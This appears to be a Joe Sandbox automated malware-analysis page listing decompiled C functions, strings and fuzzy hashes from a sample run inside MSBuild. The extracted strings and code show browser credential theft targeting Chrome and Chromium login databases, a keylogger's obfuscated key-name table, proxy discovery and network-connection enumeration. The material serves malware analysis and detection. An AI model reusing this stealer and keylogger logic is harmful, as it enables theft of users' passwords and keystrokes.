                        Function 00408AB3 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00408AB3(intOrPtr __eax) {
				intOrPtr _v20;
				signed int _v24;
				signed int _t7;
				intOrPtr* _t8;

				_v20 = 0x422564;
				_v24 = 1;
				 *_t8 = 0; // executed
				L0041F67C(); // executed
				 *0x4223d4 = __eax;
				_t7 = 1;
				if(__eax != 0) {
					L0041F5CC();
					_t7 = 0 | __eax != 0x000000b7;
				}
				return _t7;
			}







                        0x00408ab6
                        0x00408abe
                        0x00408ac6
                        0x00408acd
                        0x00408ad7
                        0x00408adc
                        0x00408ade
                        0x00408ae0
                        0x00408aea
                        0x00408aea
                        0x00408af2

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                        • Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
                        • Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                        • Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00420420 Relevance: 5.2, Strings: 4, Instructions: 217COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ../nettle-3.5.1/memxor.c$n & 1$n == 1$o
                        • API String ID: 0-561580802
                        • Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                        • Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
                        • Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                        • Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040F281 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\Google\Chrome\User Data\Default\Login Data$%s\Google\Chrome\User Data\Local State$LOCALAPPDATA
                        • API String ID: 0-1755387443
                        • Opcode ID: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                        • Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
                        • Opcode Fuzzy Hash: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                        • Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040F382 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\Chromium\User Data\Default\Login Data$%s\Chromium\User Data\Local State$LOCALAPPDATA
                        • API String ID: 0-2609310803
                        • Opcode ID: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                        • Instruction ID: 1af54e81e90a1b2e64d1cb376851d72e513c3029c4754ec5bb28f3db25ee8883
                        • Opcode Fuzzy Hash: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                        • Instruction Fuzzy Hash: 8A011AB0408311AAC710BF22E44515EBFE0EF80358F51C83EE4D857282C77C8599CB4B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409953 Relevance: 30.2, Strings: 24, Instructions: 210COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @$@$@$[%s]$[-Wld]$[904R5 MY0ddR]$[9Cnd aWgR]$[9Cnd us]$[Ctrl+%s]$[D00Wg aWgR]$[D00Wg md85]$[D00Wg r4nI5]$[D00Wg us]$[MY0Wii mWYw]$[P50i+%Y]$[PCs6 mWYw]$[XR6d05]$[adid5d]$[c0dCw]$[cCYw6sCYd]$[j6Y]$[jR5d0]$[jRS]$[qCV]
                        • API String ID: 0-287945508
                        • Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                        • Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
                        • Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                        • Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408417 Relevance: 24.0, Strings: 19, Instructions: 294COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E00408417(void* __edx, void* __eflags, char _a4, void* _a12, char _a20, char _a24, void _a36, intOrPtr _a40, intOrPtr _a56, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, void _a80, void _a88, void _a92, void* _a116, char _a136, char _a180, char _a200) {
				char _v0;
				void _v7;
				void* _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v16;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				intOrPtr* _t121;
				char _t122;
				intOrPtr* _t123;
				intOrPtr* _t131;
				intOrPtr* _t138;
				intOrPtr _t150;
				int _t152;
				void* _t155;
				void* _t157;
				intOrPtr* _t169;
				intOrPtr* _t173;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				char _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t201;
				void* _t202;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr _t235;
				void* _t236;
				intOrPtr* _t237;
				intOrPtr* _t242;

				_t201 = __edx;
				_t237 = _t236 - E0041F3F0(0x110c);
				_t121 = E004081AA("U4R-55sTsdR");
				_v16 = "winhttp.dll";
				L0041F55C();
				_v16 = _t121;
				 *_t237 = _t121;
				L0041F5AC();
				_push(_t202);
				_t185 = _t121;
				_v28 = "U4R-55sEd590WfZ_W0u0i";
				_t122 = E004081AA(_t202);
				_v28 = "winhttp.dll";
				L0041F55C();
				_v28 = _t122;
				_v32 = _t122;
				L0041F5AC();
				_push(_t201);
				_push(_t201);
				if(_t185 != 0 && _t122 != 0) {
					memcpy( &_a80, L"InternetProxy", 7 << 2);
					_t191 = 0;
					_v24 = 0;
					_v28 = 0;
					_v32 = 0;
					_v36 = 1;
					_v40 =  &_a80;
					_a4 = 0;
					_t150 =  *_t185();
					_t237 = _t237 + 0xc - 0x14;
					_t189 = _t150;
					if(_t150 != 0) {
						_t201 =  &_a24;
						_t152 = memset( &_a36, _v16, 6 << 2);
						_a36 = 1;
						_a40 = 3;
						_a56 = 1;
						memset(_t201, _t152, 3 << 2);
						_t155 = memcpy( &_a88, L"http://www.yandex.com", 0xb << 2);
						_t242 = _t237 + 0x24;
						_t191 = 0;
						_v52 = _t155;
						_v48 = _t201;
						 *_t242 = _t189;
						_v56 =  &_a88;
						_t157 = _v0();
						_t237 = _t242 - 0x10;
						if(_t157 != 0) {
							memcpy( &_v7, "socks=", 7);
							_t237 = _t237 + 0xc;
							_t191 = 0;
							_v64 = _t190;
							_v68 = _t235;
							_v72 =  &_v7;
							 *_t237 =  &_a180;
							_t169 = E00408306(0, _t248);
							if(_t169 != 0) {
								 *_t237 = 0x8c;
								L0041F714();
								_t229 = _t169;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t169 + 4;
								E00412548();
								 *_t229 = 0;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t229 + 0x44)) = E00412666(0);
								_t173 =  *0x42b304;
								 *0x42b304 = _t229;
								 *((intOrPtr*)(_t229 + 0x88)) = _t173;
								 *_t237 = 0x8c;
								L0041F714();
								_t230 = _t173;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t173 + 4;
								E00412548();
								 *_t230 = 2;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t230 + 0x44)) = E00412666(0);
								 *0x42b304 = _t230;
								 *((intOrPtr*)(_t230 + 0x88)) =  *0x42b304;
								_v68 = 4;
								_v72 = 0x422fa5;
								 *_t237 = 0x4223dc;
								E00412548();
							}
						}
					}
				}
				_t123 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
				_v40 = "winhttp.dll";
				_t186 = _t123;
				L0041F55C();
				_push(_t191);
				_v40 = _t186;
				_v44 = _t123;
				L0041F5AC();
				_push(_t186);
				_t221 = _t123;
				_push(_t186);
				if(_t123 != 0) {
					_v52 = 0x10;
					L0041F714();
					_t187 = _t123;
					_v52 = _t123;
					_t123 =  *_t221();
					_t251 = _t123;
					_push(_t201);
					if(_t123 != 0) {
						_v48 = "%S";
						_t188 =  &_a20;
						_v52 = 0x1000;
						_t233 =  &_a136;
						_v44 =  *((intOrPtr*)(_t187 + 8));
						_v56 =  &_a200;
						E004127A8();
						E00412588( &_a200, 0x422f70, 0x1000);
						_v44 = _t188;
						_v48 =  &_a136;
						_a64 = 0x68;
						_a65 = 0x74;
						_v52 =  &_a64;
						_a66 = 0x74;
						_a67 = 0x70;
						_a68 = 0x3d;
						_v56 =  &_a200;
						_a69 = 0;
						_t131 = E00408306(_t191, _t251);
						_t252 = _t131;
						if(_t131 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t225 = _t131;
							E00412548(_t131 + 4, _t233, 0x40);
							 *_t225 = 3;
							_v56 = _t188;
							 *((intOrPtr*)(_t225 + 0x44)) = E00412666(_t191);
							 *0x42b304 = _t225;
							 *((intOrPtr*)(_t225 + 0x88)) =  *0x42b304;
							E00412548(0x4223dc, 0x422fa5, 4);
						}
						memcpy( &_a92, "socks=", 7);
						_t237 = _t237 + 0xc;
						_t123 = E00408306(0, _t252,  &_a200,  &_a92, _t233, _t188);
						if(_t123 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t223 = _t123;
							E00412548(_t123 + 4, _t233, 0x40);
							 *_t223 = 2;
							_v56 = _t188;
							 *((intOrPtr*)(_t223 + 0x44)) = E00412666(0);
							_t138 =  *0x42b304;
							 *0x42b304 = _t223;
							 *((intOrPtr*)(_t223 + 0x88)) = _t138;
							_v56 = 0x8c;
							L0041F714();
							_t224 = _t138;
							E00412548(_t138 + 4, _t233, 0x40);
							 *_t224 = 0;
							_v56 = _t188;
							 *((intOrPtr*)(_t224 + 0x44)) = E00412666(0);
							 *0x42b304 = _t224;
							 *((intOrPtr*)(_t224 + 0x88)) =  *0x42b304;
							_t123 = E00412548(0x4223dc, 0x422fa5, 4);
						}
					}
				}
				return _t123;
			}





















































                        0x00408417
                        0x00408425
                        0x0040842e
                        0x00408433
                        0x0040843c
                        0x00408442
                        0x00408446
                        0x00408449
                        0x0040844e
                        0x00408450
                        0x00408452
                        0x00408459
                        0x0040845e
                        0x00408467
                        0x0040846d
                        0x00408471
                        0x00408474
                        0x0040847b
                        0x0040847c
                        0x0040847d
                        0x0040849b
                        0x0040849b
                        0x004084a1
                        0x004084a9
                        0x004084b1
                        0x004084b9
                        0x004084c1
                        0x004084c4
                        0x004084c8
                        0x004084ca
                        0x004084cf
                        0x004084d1
                        0x004084db
                        0x004084ed
                        0x004084f6
                        0x004084fe
                        0x00408506
                        0x0040850e
                        0x00408520
                        0x00408520
                        0x00408520
                        0x00408522
                        0x0040852d
                        0x00408531
                        0x00408534
                        0x00408538
                        0x0040853a
                        0x0040853f
                        0x00408648
                        0x00408648
                        0x00408648
                        0x0040864e
                        0x00408652
                        0x00408656
                        0x00408661
                        0x00408664
                        0x0040866b
                        0x00408671
                        0x00408678
                        0x0040867d
                        0x00408682
                        0x0040868a
                        0x0040868e
                        0x00408691
                        0x00408696
                        0x0040869c
                        0x004086a4
                        0x004086a7
                        0x004086ac
                        0x004086b2
                        0x004086b8
                        0x004086bf
                        0x004086c4
                        0x004086c9
                        0x004086d1
                        0x004086d5
                        0x004086d8
                        0x004086dd
                        0x004086e3
                        0x004086eb
                        0x004086f3
                        0x004086f9
                        0x004086ff
                        0x00408707
                        0x0040870f
                        0x00408716
                        0x00408716
                        0x0040866b
                        0x0040853f
                        0x004084d1
                        0x00408722
                        0x00408727
                        0x0040872e
                        0x00408730
                        0x00408735
                        0x00408736
                        0x0040873a
                        0x0040873d
                        0x00408744
                        0x00408745
                        0x00408747
                        0x00408748
                        0x0040874e
                        0x00408755
                        0x0040875a
                        0x0040875c
                        0x0040875f
                        0x00408761
                        0x00408763
                        0x00408764
                        0x0040876d
                        0x00408775
                        0x00408779
                        0x00408781
                        0x00408788
                        0x00408793
                        0x00408796
                        0x004087b5
                        0x004087be
                        0x004087c2
                        0x004087c6
                        0x004087cb
                        0x004087d0
                        0x004087db
                        0x004087e0
                        0x004087e5
                        0x004087ea
                        0x004087ed
                        0x004087f2
                        0x004087f7
                        0x004087f9
                        0x004087fb
                        0x00408802
                        0x00408807
                        0x0040881b
                        0x00408820
                        0x00408826
                        0x0040882e
                        0x00408836
                        0x0040883c
                        0x00408859
                        0x00408859
                        0x0040886f
                        0x0040886f
                        0x0040888e
                        0x00408895
                        0x0040889b
                        0x004088a2
                        0x004088a7
                        0x004088bb
                        0x004088c0
                        0x004088c6
                        0x004088ce
                        0x004088d1
                        0x004088d6
                        0x004088dc
                        0x004088e2
                        0x004088e9
                        0x004088ee
                        0x00408902
                        0x00408907
                        0x0040890d
                        0x00408915
                        0x0040891d
                        0x00408923
                        0x00408940
                        0x00408940
                        0x00408895
                        0x00408764
                        0x0040894f

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 001$=$=$@$InternetProxy$U4R-55sEd590WfZ_W0u0i$U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0$U4R-55sTsdR$h$h$http://www.yandex.com$p$p$socks=$t$t$t$t$winhttp.dll
                        • API String ID: 0-337019666
                        • Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                        • Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
                        • Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                        • Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041AC15 Relevance: 15.2, Strings: 12, Instructions: 218COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )$A$D$D$G$H$I$I$N$P$R$T
                        • API String ID: 0-4026286603
                        • Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                        • Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
                        • Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                        • Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040262F Relevance: 11.5, Strings: 9, Instructions: 282COMMON
                        Download Yara Rule
                        C-Code - Quality: 45%
                        			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				char _v608;
				char _v624;
				char _v868;
				char _v876;
				char _v916;
				intOrPtr _v936;
				signed short _v944;
				signed short _v948;
				intOrPtr _v964;
				intOrPtr _v968;
				signed short _v972;
				intOrPtr _v976;
				signed short _v980;
				char _v988;
				signed short _v996;
				signed short _v1000;
				signed short _v1004;
				signed short _v1008;
				signed int _v1010;
				signed short _v1012;
				signed short _v1014;
				intOrPtr _v1016;
				signed int _v1018;
				char* _v1020;
				signed short _v1022;
				signed short _v1024;
				signed short _v1028;
				signed short _v1032;
				signed short _v1036;
				signed int _v1040;
				signed int _v1048;
				signed short _v1052;
				signed short _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				char _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr* _t144;
				signed short _t147;
				void* _t150;
				void* _t162;
				void* _t163;
				signed short _t164;
				void* _t165;
				signed short _t168;
				void* _t169;
				signed int _t170;
				signed int _t179;
				signed short _t182;
				void* _t183;
				signed short _t186;
				void* _t187;
				signed int _t188;
				void* _t192;
				signed int _t193;
				signed int _t206;
				intOrPtr* _t211;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t223;
				signed int _t231;
				signed short* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed short* _t237;
				signed short* _t238;
				void* _t239;
				signed int* _t240;

				_t223 = __edx;
				_t220 = __ecx;
				_t237 =  &_v1004;
				E0041236C( &_v944,  &_v944, 0x8000);
				_t139 = E00407F7A(_t223, "iphlpapi.dll");
				_v1020 = "psapi.dll";
				_v976 = _t139;
				_t140 = E00407F7A(_t223);
				_v1020 = "kernel32.dll";
				_v968 = _t140;
				_t141 = E00407F7A(_t223);
				_v1020 = "Ed5jf5dRSdSqYsqCVid";
				_v964 = _t141;
				_t144 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed5jf5dRSdSuSsqCVid";
				_t211 = _t144;
				_t147 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
				_v972 = _t147;
				_t150 = E00407F8E(_t223, _v968, E004081AA());
				if(_t150 == 0) {
					_t150 = E00407F8E(_t223, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
				}
				_t224 = _t223 & 0xffffff00 | _t211 == 0x00000000;
				_t222 = _t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000;
				if((_t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000) != 0 || _t150 == 0) {
					L24:
					_t212 =  &_v944;
					if(_v936 == 0) {
						_v1008 = 0;
						_v1012 = 0;
						_v1016 = 0xe5;
					} else {
						_v1008 = E00412540( &_v944);
						_v1016 = 0xe4;
						_v1012 = _v944;
					}
					E00405D7D(_t224, _a4);
					E004123B1(_t212);
					E00407FAB(_v976);
					E00407FAB(_v968);
					return E00407FAB(_v964);
				} else {
					_t232 =  &_v948;
					_v948 = 0;
					_v1000 = 0;
					_v1004 = 5;
					_v1008 = 2;
					_v1012 = 1;
					_v1016 = _t232;
					_v1020 = 0;
					_t162 =  *_t211();
					_t238 = _t237 - 0x18;
					if(_t162 != 0x7a) {
						L14:
						_t213 =  &_v972;
						_v972 = 0;
						_v1024 = 0;
						_v1028 = 1;
						_v1032 = 2;
						_v1036 = 1;
						_v1040 = _t213;
						 *_t238 = 0;
						_t163 = _v996();
						_t239 = _t238 - 0x18;
						if(_t163 != 0x7a) {
							goto L24;
						}
						_t164 = _v996;
						_v1068 = _t164;
						L0041F714();
						_v1000 = _t164;
						if(_t164 == 0) {
							goto L24;
						}
						_v1048 = 0;
						_v1052 = 1;
						_v1056 = 2;
						_v1060 = 1;
						_v1064 = _t213;
						_v1068 = _t164;
						_t165 = _v1020();
						_t240 = _t239 - 0x18;
						if(_t165 != 0) {
							L22:
							if(_v1024 != 0) {
								E00407F59( &_v1024);
							}
							goto L24;
						}
						_t233 = 0;
						_t235 =  &_v876;
						while(1) {
							_t168 = _v1024;
							if(_t233 >=  *_t168) {
								goto L22;
							}
							_t214 = _t233 * 0xc;
							_t169 = _t168 + _t214;
							_t170 =  *(_t169 + 8) & 0x0000ffff;
							_v1092 = _t170;
							L0041F914();
							_v1096 =  *((intOrPtr*)(_t169 + 4));
							_v1048 = _t170;
							L0041F924();
							_v1088 = _t170;
							_v1092 = 0x422c01;
							_v1096 = 0x40;
							_v1084 = _v1052 & 0x0000ffff;
							 *_t240 =  &_v1012;
							E004127A8();
							_v1092 = 0x104;
							_v1096 = _t235;
							 *_t240 =  *(_v1032 + _t214 + 0xc);
							E00402570(_t222, _t224, __eflags, _t222, _t224);
							_v1080 =  &_v1012;
							_t216 =  &_v624;
							_v1088 = _t235;
							_v1092 = 0x422c07;
							_v1096 = 0x204;
							 *_t240 = _t216;
							_v1084 =  *((intOrPtr*)(_t214 + _v1032 + 0xc));
							_t179 = E004127A8();
							__eflags = _t179;
							if(_t179 > 0) {
								_v1092 = _t179;
								_v1096 = _t216;
								 *_t240 =  &_v1024;
								E00412458( &_v1024, _t224);
							}
							_t233 = _t233 + 1;
							__eflags = _t233;
						}
						goto L22;
					}
					_t182 = _v972;
					 *_t238 = _t182;
					L0041F714();
					_v980 = _t182;
					if(_t182 == 0) {
						goto L24;
					}
					_v1024 = 0;
					_v1028 = 5;
					_v1032 = 2;
					_v1036 = 1;
					_v1040 = _t232;
					 *_t238 = _t182;
					_t183 =  *_t211();
					_t238 = _t238 - 0x18;
					if(_t183 != 0) {
						L12:
						if(_v1004 != 0) {
							E00407F59( &_v1004);
						}
						goto L14;
					}
					_t234 = 0;
					_t236 =  &_v916;
					while(1) {
						_t186 = _v1004;
						if(_t234 >=  *_t186) {
							goto L12;
						}
						_t217 = _t234 * 0x18;
						_t187 = _t186 + _t217;
						_t188 =  *(_t187 + 0xc) & 0x0000ffff;
						_v1068 = _t188;
						L0041F914();
						_v1072 =  *((intOrPtr*)(_t187 + 8));
						_v1010 = _t188;
						L0041F924();
						_v1064 = _t188;
						_v1068 = "%s:%u";
						_v1072 = 0x40;
						_v1060 = _v1014 & 0x0000ffff;
						_v1076 =  &_v988;
						E004127A8();
						_t192 = _v1012 + _t217;
						_t193 =  *(_t192 + 0x14) & 0x0000ffff;
						_v1076 = _t193;
						L0041F914();
						_v1080 =  *((intOrPtr*)(_t192 + 0x10));
						_v1018 = _t193;
						L0041F924();
						_v1072 = _t193;
						_v1076 = "%s:%u";
						_v1080 = 0x40;
						_v1084 = _t236;
						_v1068 = _v1022 & 0x0000ffff;
						_t231 =  &_v868;
						E004127A8(_t222, _t224, _t222, _t224);
						_v1076 = 0x104;
						E00402570(_t222, _t224, __eflags, ( &(_v1020[_t217]))[0x18], _t231);
						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t217]))[4] * 4)));
						_v1060 = _t236;
						_v1064 =  &_v996;
						_t219 =  &_v608;
						_v1072 = _t231;
						_v1076 = 0x422bed;
						_v1080 = 0x204;
						_v1084 = _t219;
						_v1068 = ( &(_v1020[_t217]))[0x18];
						_t206 = E004127A8();
						__eflags = _t206;
						if(_t206 > 0) {
							E00412458( &_v1008, _t224,  &_v1008, _t219, _t206);
						}
						_t234 = _t234 + 1;
						__eflags = _t234;
					}
					goto L12;
				}
			}






















































































                        0x0040262f
                        0x0040262f
                        0x00402633
                        0x00402648
                        0x00402654
                        0x00402659
                        0x00402660
                        0x00402664
                        0x00402669
                        0x00402670
                        0x00402674
                        0x00402679
                        0x00402680
                        0x00402694
                        0x00402699
                        0x004026a0
                        0x004026b2
                        0x004026b7
                        0x004026be
                        0x004026d2
                        0x004026d9
                        0x004026f2
                        0x004026f2
                        0x00402701
                        0x00402704
                        0x00402706
                        0x00402a74
                        0x00402a79
                        0x00402a7d
                        0x00402a9d
                        0x00402aa5
                        0x00402aad
                        0x00402a7f
                        0x00402a87
                        0x00402a8f
                        0x00402a97
                        0x00402a97
                        0x00402abf
                        0x00402ac7
                        0x00402ad3
                        0x00402adf
                        0x00402afa
                        0x00402714
                        0x00402714
                        0x00402718
                        0x00402720
                        0x00402728
                        0x00402730
                        0x00402738
                        0x00402740
                        0x00402744
                        0x0040274b
                        0x0040274d
                        0x00402753
                        0x004028fa
                        0x004028fa
                        0x004028fe
                        0x00402906
                        0x0040290e
                        0x00402916
                        0x0040291e
                        0x00402926
                        0x0040292a
                        0x00402931
                        0x00402935
                        0x0040293b
                        0x00000000
                        0x00000000
                        0x00402941
                        0x00402945
                        0x00402948
                        0x0040294f
                        0x00402953
                        0x00000000
                        0x00000000
                        0x00402959
                        0x00402961
                        0x00402969
                        0x00402971
                        0x00402979
                        0x0040297d
                        0x00402980
                        0x00402984
                        0x00402989
                        0x00402a61
                        0x00402a66
                        0x00402a6f
                        0x00402a6f
                        0x00000000
                        0x00402a66
                        0x0040298f
                        0x00402991
                        0x00402a55
                        0x00402a55
                        0x00402a5b
                        0x00000000
                        0x00000000
                        0x0040299d
                        0x004029a0
                        0x004029a5
                        0x004029a9
                        0x004029ac
                        0x004029b2
                        0x004029b5
                        0x004029ba
                        0x004029c5
                        0x004029cd
                        0x004029d5
                        0x004029dd
                        0x004029e1
                        0x004029e4
                        0x004029ed
                        0x004029f5
                        0x004029fe
                        0x00402a01
                        0x00402a0e
                        0x00402a15
                        0x00402a1c
                        0x00402a20
                        0x00402a28
                        0x00402a30
                        0x00402a33
                        0x00402a37
                        0x00402a3c
                        0x00402a3e
                        0x00402a40
                        0x00402a48
                        0x00402a4c
                        0x00402a4f
                        0x00402a4f
                        0x00402a54
                        0x00402a54
                        0x00402a54
                        0x00000000
                        0x00402a55
                        0x00402759
                        0x0040275d
                        0x00402760
                        0x00402767
                        0x0040276b
                        0x00000000
                        0x00000000
                        0x00402771
                        0x00402779
                        0x00402781
                        0x00402789
                        0x00402791
                        0x00402795
                        0x00402798
                        0x0040279a
                        0x0040279f
                        0x004028e7
                        0x004028ec
                        0x004028f5
                        0x004028f5
                        0x00000000
                        0x004028ec
                        0x004027a5
                        0x004027a7
                        0x004028db
                        0x004028db
                        0x004028e1
                        0x00000000
                        0x00000000
                        0x004027b3
                        0x004027b6
                        0x004027bb
                        0x004027bf
                        0x004027c2
                        0x004027c8
                        0x004027cb
                        0x004027d0
                        0x004027db
                        0x004027e3
                        0x004027eb
                        0x004027f3
                        0x004027f7
                        0x004027fa
                        0x00402803
                        0x00402808
                        0x0040280c
                        0x0040280f
                        0x00402815
                        0x00402818
                        0x0040281d
                        0x00402828
                        0x0040282c
                        0x00402834
                        0x0040283c
                        0x0040283f
                        0x00402843
                        0x0040284a
                        0x00402853
                        0x00402867
                        0x00402888
                        0x00402890
                        0x00402894
                        0x0040289b
                        0x004028a2
                        0x004028a6
                        0x004028ae
                        0x004028b6
                        0x004028b9
                        0x004028bd
                        0x004028c2
                        0x004028c4
                        0x004028d5
                        0x004028d5
                        0x004028da
                        0x004028da
                        0x004028da
                        0x00000000
                        0x004028db

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll
                        • API String ID: 0-1859760768
                        • Opcode ID: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                        • Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
                        • Opcode Fuzzy Hash: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
